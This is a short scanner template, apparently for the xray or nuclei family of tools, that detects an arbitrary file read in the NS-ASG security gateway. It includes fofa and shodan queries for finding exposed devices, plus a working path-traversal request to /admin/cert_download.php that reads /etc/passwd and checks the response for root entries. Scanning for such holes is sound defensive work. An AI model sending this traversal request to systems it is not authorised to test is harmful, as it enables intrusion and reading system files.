id: ns-asg-file-read

info:
  name: NS ASG Arbitrary File Read
  author: pikpikcu,ritikchaddha
  severity: high
  description: |
    fofa-query: app="网康科技-NS-ASG安全网关"
    shodan-query: http.title:“NS-ASG”
  reference:
    - https://zhuanlan.zhihu.com/p/368054963
    - http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md

rules:
    r0:
        request:
            method: GET
            path: /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
        expression: response.status == 200 &&  "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
    r1:
        request:
            method: GET
            path: /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php
        expression: response.status == 200 && response.body.bcontains(b"$certfile") && response.body.bcontains(b"application/pdf")
expression: r0() || r1()
 
